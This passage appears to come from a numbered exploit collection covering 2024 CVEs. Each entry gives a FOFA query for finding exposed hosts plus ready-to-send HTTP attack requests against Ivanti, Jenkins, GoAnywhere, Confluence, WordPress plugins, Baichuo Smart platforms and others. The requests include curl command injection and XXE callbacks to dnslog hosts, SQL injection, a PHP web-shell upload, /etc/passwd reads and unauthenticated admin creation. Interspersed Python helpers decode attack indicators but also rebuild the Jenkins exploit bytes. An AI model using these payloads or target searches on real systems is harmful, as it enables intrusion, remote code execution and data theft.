------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


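Both Ivanti requests above hide the interesting part inside XML: entry 103 base64-encodes an external parameter entity in SAMLRequest, entry 102 points ds:RetrievalMethod at an outside URL that the signature verifier will fetch. A defender's check therefore has to decode before it can match. The following is an added example and not part of the original post or of any vendor tooling: the two sample bodies are constructed here (collector.invalid is a placeholder host), and scan_request with its endpoint names is this example's own assumption about where such bodies arrive.

```python
import base64
import re
import zlib
from urllib.parse import parse_qs, urlencode
from xml.etree import ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"

# Constructed sample bodies for offline testing (not captured traffic).
# The first mirrors the SAMLRequest shape in entry 103; collector.invalid is a placeholder.
SAMPLE_SAML_BODY = urlencode({"SAMLRequest": base64.b64encode(
    b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM\n'
    b'    "http://collector.invalid/x"> %watchTowr;]><r></r>').decode()})

# The second mirrors the signature element posted to saml20.ws in entry 102.
SAMPLE_SOAP_BODY = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    '<ds:SignedInfo><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    '<ds:SignatureValue>qwerty</ds:SignatureValue>'
    '<ds:KeyInfo><ds:RetrievalMethod URI="http://collector.invalid/keyinfo"/><ds:X509Data/></ds:KeyInfo>'
    '</ds:Signature></soap:Body></soap:Envelope>'
)

ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"([^"]*)"')


def decode_saml_request(body):
    """Return the XML text carried in a form-encoded SAMLRequest parameter.

    The POST binding sends plain base64; the Redirect binding deflates first, so a
    raw inflate is attempted only when the decoded bytes do not already look like XML.
    """
    raw = parse_qs(body)["SAMLRequest"][0]
    data = base64.b64decode(raw)
    if not data.lstrip().startswith(b"<"):
        try:
            data = zlib.decompress(data, -15)
        except zlib.error:
            pass
    return data.decode("utf-8", "replace")


def find_xxe_indicators(xml_text):
    """Flag DOCTYPE and external entity declarations without parsing the DTD.

    A resolving parser would itself fetch the SYSTEM URL, so the prolog is
    inspected textually instead of being handed to an XML library.
    """
    findings = []
    if "<!DOCTYPE" in xml_text:
        findings.append("DOCTYPE declaration")
    for m in ENTITY_RE.finditer(xml_text):
        kind = "parameter" if m.group(1) else "general"
        findings.append(f"external {kind} entity {m.group(2)} -> {m.group(3)}")
    return findings


def find_external_keyinfo(soap_xml):
    """Return RetrievalMethod URIs that point outside the document.

    A same-document reference starts with '#'; anything carrying a URL scheme is
    fetched by the signature verifier, which is the SSRF primitive in entry 102.
    """
    root = ET.fromstring(soap_xml)  # ElementTree does not fetch external resources
    hits = []
    for rm in root.iter(f"{{{DS_NS}}}RetrievalMethod"):
        uri = rm.get("URI", "")
        if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*:", uri):
            hits.append(uri)
    return hits


def scan_request(path, body):
    """Dispatch on the two endpoints from entries 102 and 103 (hypothetical helper)."""
    if path.endswith("/dana-na/auth/saml-sso.cgi"):
        return find_xxe_indicators(decode_saml_request(body))
    if path.endswith("/dana-ws/saml20.ws"):
        return [f"external KeyInfo reference {u}" for u in find_external_keyinfo(body)]
    return []
```

Match on the decoded XML, not on the raw body: the base64 in entry 103 contains no string a signature such as "<!ENTITY" could hit, and a KeyInfo pointing at an internal address looks identical to a benign one until the URI is actually read.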
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

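The body above is a framed binary protocol, not text: each frame is a 4-byte big-endian payload length, one opcode byte (ARG, LOCALE, ENCODING, START, ...) and the payload, and args4j then expands an argument of the form @path into one argument per line of that file, which is why the first line of /etc/passwd lands in the "default:" slot and the second in the "Too many arguments" error. Two practical caveats: the request must carry the raw 57 bytes rather than the b'...' text shown (the listing's Content-Length does not correspond to either), and the download request with the same Session is opened first and kept open so that the reply has somewhere to go. The following builder and decoder is an added example, not code from the original post or from Jenkins; the download-side response it decodes is constructed here, not a capture.

```python
import struct

# Opcodes of Jenkins' PlainCLIProtocol.Op, listed in ordinal order.
OPS = ["ARG", "LOCALE", "ENCODING", "START", "EXIT", "STDIN", "END_STDIN", "STDOUT", "STDERR"]
OP = {name: code for code, name in enumerate(OPS)}


def _utf(text):
    # Java DataOutputStream.writeUTF: 2-byte big-endian length, then (modified) UTF-8.
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op, payload=b""):
    # One frame: int32 payload length, one opcode byte, payload. The length does
    # not include the opcode byte, which is why ARG "help" starts 00 00 00 06.
    return struct.pack(">I", len(payload)) + bytes([OP[op]]) + payload


def build_upload_body(args, encoding="GBK", locale="en_US"):
    """Body of the 'Side: upload' request: arguments, client encoding and locale, then START."""
    body = b"".join(frame("ARG", _utf(a)) for a in args)
    body += frame("ENCODING", _utf(encoding))
    body += frame("LOCALE", _utf(locale))
    body += frame("START")
    return body


def parse_frames(data):
    """Decode a frame stream into (opcode, value) pairs; works for either direction."""
    frames = []
    pos = 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack_from(">I", data, pos)
        op = OPS[data[pos + 4]]
        payload = data[pos + 5:pos + 5 + length]
        if op in ("ARG", "LOCALE", "ENCODING"):
            value = payload[2:].decode("utf-8")      # strip the writeUTF length prefix
        elif op == "EXIT":
            (value,) = struct.unpack(">i", payload)  # 4-byte exit code
        elif op in ("STDIN", "STDOUT", "STDERR"):
            value = payload                          # raw stream bytes
        else:
            value = None                             # START / END_STDIN carry nothing
        frames.append((op, value))
        pos += 5 + length
    return frames


def leaked_lines(download_body):
    """Collect what the server echoed back on the 'Side: download' connection."""
    text = b"".join(v for op, v in parse_frames(download_body) if op in ("STDOUT", "STDERR"))
    return text.decode("utf-8", "replace").splitlines()


# Constructed stand-in for a download-side response (not a real capture): the help
# command rejects the expanded file lines as excess arguments and exits non-zero.
SAMPLE_DOWNLOAD = (
    frame("STDERR", b"ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
    + frame("STDERR", b"java -jar jenkins-cli.jar help [COMMAND]\n")
    + frame("EXIT", struct.pack(">i", 2))
)
```

build_upload_body(["help", "@/etc/passwd"]) reproduces the 57 bytes of the listing exactly, so the same function can generate detection fixtures or be used to confirm that a patched instance no longer expands @-arguments.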
110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


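Entries 91 and 110, like the path in entry 95, rely on the same trick: a servlet container such as Tomcat treats everything from ";" to the next "/" as a path parameter and strips it before resolving ".." and routing, so "/images/..;/wizard/" reaches the wizard servlet while a front-end rule that compares the raw request URI against a protected prefix never matches. The following is an added example, not code from the original post or from any of the affected products: it models that normalization so the raw and the routed path can be compared, and the protected prefixes passed to is_traversal_bypass are hypothetical.

```python
from urllib.parse import unquote


def strip_path_parameters(path):
    """Drop ';...' from every segment, as a servlet container does before routing.

    ';jsessionid=...' is the legitimate use; '..;' is the bypass in entries 91 and 110.
    """
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def remove_dot_segments(path):
    """Resolve '.' and '..' on an absolute path (RFC 3986 section 5.2.4 logic)."""
    segments = path.split("/")[1:]           # drop the empty piece before the leading '/'
    out = []
    for seg in segments:
        if seg == "..":
            if out:                          # '..' above the root is clipped here; Tomcat answers 400
                out.pop()
        elif seg not in ("", "."):           # empty segments ('//') collapse, '.' disappears
            out.append(seg)
    if segments and segments[-1] in ("", ".", ".."):
        out.append("")                       # a trailing '/', '/.' or '/..' keeps the directory slash
    return "/" + "/".join(out)


def container_view(raw_path):
    """What the servlet layer routes on: path parameters removed, then percent-decoded, then dots resolved.

    The order matters: '%3b' is decoded only after parameter stripping, so it stays a literal ';'.
    """
    return remove_dot_segments(unquote(strip_path_parameters(raw_path)))


def filter_view(raw_path):
    """What a naive front filter matching on the raw request URI sees: the query removed, nothing else."""
    return raw_path.split("?", 1)[0]


def is_traversal_bypass(raw_path, protected_prefixes):
    """True when the raw URI avoids every protected prefix but the routed path lands inside one."""
    raw = filter_view(raw_path)
    routed = container_view(raw)
    return (not any(raw.startswith(p) for p in protected_prefixes)
            and any(routed.startswith(p) for p in protected_prefixes))
```

The fix on the defending side is the same comparison in reverse: authorize on the path the container has already normalized (the servlet path and path info), or reject requests whose raw URI contains ";" or an encoded dot segment at all, which is what Spring Security's StrictHttpFirewall does by default.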
111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
